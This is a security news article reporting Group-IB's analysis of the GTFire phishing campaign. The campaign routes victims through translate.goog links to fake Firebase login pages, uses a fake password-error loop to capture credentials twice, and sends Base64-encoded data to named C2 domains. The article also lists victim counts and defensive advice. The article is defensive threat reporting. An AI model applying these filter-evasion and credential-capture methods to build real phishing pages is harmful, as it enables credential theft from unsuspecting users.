GTFire Phishing Campaign Abuses Google Firebase and Translate for Credential Theft

Home » News
Yash Shield
News
Reading time icon 2 min. read

Calendar icon Published on

GTFire phishing scheme uses Google Translate and Firebase to steal login credentials worldwide. Attackers hide behind trusted Google domains to bypass email filters and security gateways. Victims enter details on fake brand pages, then get redirected to real sites unaware of the theft.

Group-IB uncovered this operation targeting over 1,000 organizations across 100+ countries. Servers exposed thousands of stolen credentials from 200+ industries. Mexico tops the list with 385 victims in manufacturing, education, and government sectors. The US follows with 101 cases.

Phishers reuse templates for brands with small tweaks. Pages collect credentials in steps. Data sorts by date, language, and service on central servers. Over 120 domains use random names for quick swaps.

Links start with translate.goog URLs. These relay through Google’s proxy to Firebase *.web.app phishing sites. Legit Google domains dodge blocks. Pages mimic brands perfectly with dynamic logos.

GTfire phishing scheme (Source – Group-IB)

Victims type credentials. Pages show fake “wrong password” errors to grab second tries too. Data hits C2 servers via GET requests with Base64 passwords plus country and browser info. LiteSpeed servers run All-in-1.php scripts.

Victim Distribution

CountryVictimsTop Sectors
Mexico385Manufacturing, Education, Government
USA101Various
Spain67Various
India54Various
Argentina50Various
GTFire phishing scheme global victimology (Source – Group-IB)

Redirects to real sites delay detection. Traditional filters miss Google-hosted phishing. Rapid subdomain rotation beats blocklists.

GTFire infrastructure (Source – Group-IB)

Attack Flow

  • Phishing email with translate.goog link.
  • Routes to Firebase *.web.app fake login.
  • Victim submits credentials twice via error loop.
  • Data to C2: jnhwzs.fyi, gnpnia.lat.
  • Silent redirect to legit brand site.
Phishing pages use fake error prompts (Source – Group-IB)

Deploy phishing-resistant MFA everywhere. Train staff on translate.goog + Firebase patterns. Monitor cloud platforms for brand fakes. Share IOCs with CERT teams.

FAQ

What services does GTFire abuse?

Google Translate (translate.goog) and Firebase (*.web.app subdomains).

How many victims by country?

Mexico 385, US 101, Spain 67, India 54, Argentina 50.

What tricks pages use?

Fake “wrong password” to capture two credential sets.

C2 indicators?

jnhwzs.fyi, gnpnia.lat; All-in-1.php scripts.

How to block GTFire?

MFA, train on Google URL patterns, monitor Firebase abuse.

Yash

Yash Shield

I am a Business Analytics student with a strong interest in publishing well-researched and data-driven news articles. I focus on analyzing trends in business, finance, and technology to create clear, accurate, and engaging content for readers. I enjoy transforming complex data and information into simple, meaningful stories that help audiences understand current developments. With analytical thinking and attention to detail, I aim to deliver credible and insightful news that adds real value to readers.

Readers help support VPNCentral. We may get a commission if you buy through our links. Tooltip Icon

Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more

User forum

0 messages